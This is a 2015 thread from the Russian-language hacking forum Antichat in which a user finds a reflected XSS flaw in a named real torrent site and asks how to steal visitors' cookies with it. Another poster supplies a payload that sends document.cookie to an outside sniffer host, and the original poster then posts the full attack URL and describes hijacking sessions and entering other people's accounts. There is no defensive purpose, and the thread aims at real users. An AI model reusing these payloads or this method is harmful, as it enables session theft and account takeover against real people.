Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   нашол такую хсс (https://forum.antichat.xyz/showthread.php?t=429051)

Octavian 16.08.2015 13:04

нашол такую хсс при нажатие в правом углу на закрытие появляется алерт

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+docume nt.cookie)+'&lang=ro

где типерь запихнуть сылку сниффера помоги пожалуста

http://hacker-lab.com/sniffer/images/251095_3.jpg

Octavian 16.08.2015 13:07

Неудаляите пожалуста тему а то надаело мучятся

hahanovB 16.08.2015 14:25

Цитата:

Сообщение от Octavian

Неудаляите пожалуста тему а то надаело мучятся

У тебя пассивка ищи активку и тогда сможешь запихнуть сниффер...

Подробнее: тут

faza02 16.08.2015 17:29

Цитата:

Сообщение от hahanovB

У тебя пассивка ищи активку и тогда сможешь запихнуть сниффер...
Подробнее:
тут

какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.

Цитата:

Сообщение от Octavian

нашол такую хсс при нажатие в правом углу на закрытие появляется алерт
http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+docume nt.cookie)+'&lang=ro
где типерь запихнуть сылку сниффера помоги пожалуста
//hacker-lab.com/sniffer/images/251095_3.jpg

такого рода код:

'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'

не забудьте про URLEncode, плюсы в %2b, пробелы в +

Octavian 16.08.2015 19:44

Цитата:

Сообщение от yarbabin

какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +

Друг можно всю сылку и чтоб провериная была о то многие типа помоглали но ничево на снифере неприходило,спасибо

Octavian 16.08.2015 19:46

жутко пишу по русски прошу прощения ето не мои язык

Octavian 16.08.2015 19:49

Цитата:

Сообщение от yarbabin

какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro

нехочет так

funny_kaplan 16.08.2015 20:42

Цитата:

Сообщение от Octavian

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new
Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro
нехочет так

тогда так:


Octavian 17.08.2015 16:19

Цитата:

Сообщение от funny_kaplan

тогда так:

друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg

Octavian 17.08.2015 16:20

друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg


Время: 08:39